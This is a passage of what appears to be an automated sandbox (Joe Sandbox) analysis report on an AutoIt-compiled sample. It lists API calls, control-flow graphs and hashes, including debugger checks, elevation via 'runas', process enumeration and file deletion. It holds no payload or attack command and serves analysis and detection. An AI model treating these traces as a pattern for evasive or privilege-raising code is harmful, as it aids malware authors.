InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105016->105067 105017->104983 105019 ff3a00 105068 10212eb CreateThread 105019->105068 105021 ff3a0c CloseHandle 105021->105015 105022->104985 105069 fb2a91 105023->105069 105026 fb2a91 8 API calls 105027 fb2a70 105026->105027 105028 fbbf73 8 API calls 105027->105028 105029 fb2a7c 105028->105029 105030 fb8577 8 API calls 105029->105030 105031 fb27c9 105030->105031 105032 fb327e 6 API calls 105031->105032 105032->104990 105034 fbbf73 8 API calls 105033->105034 105035 fb2dcc 105034->105035 105036 fbbf73 8 API calls 105035->105036 105037 fb2dd4 105036->105037 105076 fb81d6 105037->105076 105040 fb81d6 8 API calls 105041 fb2de4 105040->105041 105042 fbbf73 8 API calls 105041->105042 105043 fb2def 105042->105043 105044 fd014b 8 API calls 105043->105044 105045 fb293c 105044->105045 105046 fb3205 105045->105046 105047 fb3213 105046->105047 105048 fbbf73 8 API calls 105047->105048 105049 fb321e 105048->105049 105050 fbbf73 8 API calls 105049->105050 105051 fb3229 105050->105051 105052 fbbf73 8 API calls 105051->105052 105053 fb3234 105052->105053 105054 fbbf73 8 API calls 105053->105054 105055 fb323f 105054->105055 105056 fb81d6 8 API calls 105055->105056 105057 fb324a 105056->105057 105058 fd014b 8 API calls 105057->105058 105059 fb3251 RegisterWindowMessageW 105058->105059 105059->105004 105061 ff3c8f 105060->105061 105062 fb3176 105060->105062 105079 1023c4e 8 API calls 105061->105079 105064 fd014b 8 API calls 105062->105064 105066 fb317e 105064->105066 105065 ff3c9a 105066->105010 105067->105019 105068->105021 105080 10212d1 14 API calls 105068->105080 105070 fbbf73 8 API calls 105069->105070 105071 fb2a9c 105070->105071 105072 fbbf73 8 API calls 105071->105072 105073 fb2aa4 105072->105073 105074 fbbf73 8 API calls 105073->105074 105075 fb2a66 105074->105075 105075->105026 105077 fbbf73 8 API calls 105076->105077 105078 fb2ddc 105077->105078 105078->105040 105079->105065

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 00FB5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 237 fb5fc8-fb6037 call fbbf73 GetVersionExW call fb8577 242 ff507d-ff5090 237->242 243 fb603d 237->243 245 ff5091-ff5095 242->245 244 fb603f-fb6041 243->244 248 ff50bc 244->248 249 fb6047-fb60a6 call fbadf4 call fb55dc 244->249 246 ff5098-ff50a4 245->246 247 ff5097 245->247 246->245 250 ff50a6-ff50a8 246->250 247->246 253 ff50c3-ff50cf 248->253 262 fb60ac-fb60ae 249->262 263 ff5224-ff522b 249->263 250->244 252 ff50ae-ff50b5 250->252 252->242 255 ff50b7 252->255 256 fb611c-fb6136 GetCurrentProcess IsWow64Process 253->256 255->248 258 fb6138 256->258 259 fb6195-fb619b 256->259 261 fb613e-fb614a 258->261 259->261 264 ff5269-ff526d GetSystemInfo 261->264 265 fb6150-fb615f LoadLibraryA 261->265 266 ff5125-ff5138 262->266 267 fb60b4-fb60b7 262->267 268 ff522d 263->268 269 ff524b-ff524e 263->269 273 fb619d-fb61a7 GetSystemInfo 265->273 274 fb6161-fb616f GetProcAddress 265->274 275 ff513a-ff5143 266->275 276 ff5161-ff5163 266->276 267->256 277 fb60b9-fb60f5 267->277 270 ff5233 268->270 271 ff5239-ff5241 269->271 272 ff5250-ff525f 269->272 270->271 271->269 272->270 283 ff5261-ff5267 272->283 285 fb6177-fb6179 273->285 274->273 284 fb6171-fb6175 GetNativeSystemInfo 274->284 278 ff5145-ff514b 275->278 279 ff5150-ff515c 275->279 281 ff5198-ff519b 276->281 282 ff5165-ff517a 276->282 277->256 280 fb60f7-fb60fa 277->280 278->256 279->256 286 ff50d4-ff50e4 280->286 287 fb6100-fb610a 280->287 290 ff519d-ff51b8 281->290 291 ff51d6-ff51d9 281->291 288 ff517c-ff5182 282->288 289 ff5187-ff5193 282->289 283->271 284->285 292 fb617b-fb617c FreeLibrary 285->292 293 fb6182-fb6194 285->293 297 ff50f7-ff5101 286->297 298 ff50e6-ff50f2 286->298 287->253 294 fb6110-fb6116 287->294 288->256 289->256 295 ff51ba-ff51c0 290->295 296 ff51c5-ff51d1 290->296 291->256 299 ff51df-ff5206 291->299 292->293 294->256 295->256 296->256 300 ff5114-ff5120 297->300 301 ff5103-ff510f 297->301 298->256 302 ff5208-ff520e 299->302 303 ff5213-ff521f 299->303 300->256 301->256 302->256 303->256
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00FB5FF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,0104DC2C,00000000,?,?), ref: 00FB6123
                                                                                                                                                                                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00FB612A
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FB6155
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FB6167
                                                                                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00FB6175
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00FB617C
                                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00FB61A1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                                        • Opcode ID: 187648f1bb84ba47a362f0cfc98f039e028d42c2150096fada6831cb4e838ce4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2affcc8f05d80c32117cce228c64ed38e7d51168d20c847bc2be09e6fb06168b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 187648f1bb84ba47a362f0cfc98f039e028d42c2150096fada6831cb4e838ce4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49A1917290E6D4DFC732CBAA74612ED3FA46B36710B08C899D5C1A721AC62F4548EF35
                                                                                                                                                                                                                                                                                                        Function 00FB338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00FB3368,?), ref: 00FB33BB
                                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00FB3368,?), ref: 00FB33CE
                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,01082418,01082400,?,?,?,?,?,?,00FB3368,?), ref: 00FB343A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FB3462,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FB42A0
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FB34BB
                                                                                                                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00FF3CB0
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FF3CF1
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,010731F4,01082418,?,?,?,?,?,?,?,00FB3368), ref: 00FF3D7A
                                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FF3D81
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: GetSysColorBrush.USER32(0000000F), ref: 00FB34DE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00FB34ED
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: LoadIconW.USER32(00000063), ref: 00FB3503
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: LoadIconW.USER32(000000A4), ref: 00FB3515
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: LoadIconW.USER32(000000A2), ref: 00FB3527
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB353F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB34D3: RegisterClassExW.USER32(?), ref: 00FB3590
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB35E1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3602
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB3616
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB361F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3A3C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • AutoIt, xrefs: 00FF3CA5
                                                                                                                                                                                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00FF3CAA
                                                                                                                                                                                                                                                                                                        • runas, xrefs: 00FF3D75
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                                                                                                                        • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                                        • Opcode ID: 20b32a772c44092391d729b54d7fa9c7aa020d257f964fc11d31f327b2a4e090
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0b1c3aeef545d1e3aab8ef70ac95cc7929e9e1d32f39d3cf6aa915f3254a513c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20b32a772c44092391d729b54d7fa9c7aa020d257f964fc11d31f327b2a4e090
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51127164C344AAD621FF66DC41DFE7BB8AF94710F00141CF6C296166DF2E8A49EB22
                                                                                                                                                                                                                                                                                                        Function 0101DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 1026 101dc54-101dc9b call fbbf73 * 3 call fb5851 call 101eab0 1037 101dcab-101dcdc call fb568e FindFirstFileW 1026->1037 1038 101dc9d-101dca6 call fb6b7c 1026->1038 1042 101dd4b-101dd52 FindClose 1037->1042 1043 101dcde-101dce0 1037->1043 1038->1037 1044 101dd56-101dd78 call fbbd98 * 3 1042->1044 1043->1042 1045 101dce2-101dce7 1043->1045 1047 101dd26-101dd38 FindNextFileW 1045->1047 1048 101dce9-101dd24 call fbbed9 call fb7bb5 call fb6b7c DeleteFileW 1045->1048 1047->1043 1049 101dd3a-101dd40 1047->1049 1048->1047 1061 101dd42-101dd49 FindClose 1048->1061 1049->1043 1061->1044
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101EAB0: GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0101DCCB
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101DD1B
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0101DD2C
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101DD43
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101DD4C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                        • Opcode ID: eda99e3c664438baeb4ae2274741a5ae83093073c16b61983c284698ac554918
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0cd14049261412c4ebd47268481040e9f60127e98d16e7271b012277568c149d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eda99e3c664438baeb4ae2274741a5ae83093073c16b61983c284698ac554918
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF31AE31008345ABC301FFA5CD858EFB7E8BEA5300F404D5DF5D182191EB69DA09DB62
                                                                                                                                                                                                                                                                                                        Function 0101DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0101DDAC
                                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0101DDBA
                                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0101DDDA
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0101DE87
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3150c062f25313f3935006a1f15b2db3ab53546da4e94f36f6d5745506f14a3d
                                                                                                                                                                                                                                                                                                        • Instruction ID: cce61db01444c849ee89e53a02ffb34f8561bec8476d77c6ac179c69088b3c03
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3150c062f25313f3935006a1f15b2db3ab53546da4e94f36f6d5745506f14a3d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96319171108301AFD311EF94CC85AAFBBE8AF99340F04092DF5C1831A1DB7AD949CB92
                                                                                                                                                                                                                                                                                                        Function 00FCFFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                        • Instruction ID: f3686968394aa8d3583fd9473a6eb451edcfb489d4363c7b45347a76e3886a48
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1531C771A00105EBC718DF58D488B69FBA6FB49310F2886A6E409CB352DB71EDC1EBC0
                                                                                                                                                                                                                                                                                                        Function 00FBEE50 Relevance: 21.6, APIs: 14, Instructions: 614windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 00FBEF07
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00FBF107
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBF228
                                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00FBF27B
                                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00FBF289
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBF29F
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00FBF2B1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 766709d1e04f4022f094ed87d1b1c41d0a5c8940eb4774b8af07c75c9e8d95a8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 30c9f4216c585110f17c51b67cb500f27dc6910a98f7e7975d77c6e4f4720c20
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 766709d1e04f4022f094ed87d1b1c41d0a5c8940eb4774b8af07c75c9e8d95a8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6532F270A08242EFE726DF25CC84BEABBE1BF81314F14456DE5958B291C775E848DF82
                                                                                                                                                                                                                                                                                                        Function 00FB3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FB3657
                                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00FB3681
                                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB3692
                                                                                                                                                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00FB36AF
                                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB36BF
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00FB36D5
                                                                                                                                                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB36E4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                        • Opcode ID: 73317a637ef3aa93f855066703ccae0dab8c93b7927e2830cc29c0fb5415ae8e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4647a11bfb8117fdbfecb2fc113b86f9d9a7df64232ce6cd8b8d5aa2b32c0e59
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73317a637ef3aa93f855066703ccae0dab8c93b7927e2830cc29c0fb5415ae8e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 532103B5D05348AFDB20DFE4E989BDDBBB4FB18750F00511AFA91A6284E7BA4540CF90
                                                                                                                                                                                                                                                                                                        Function 00FF09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
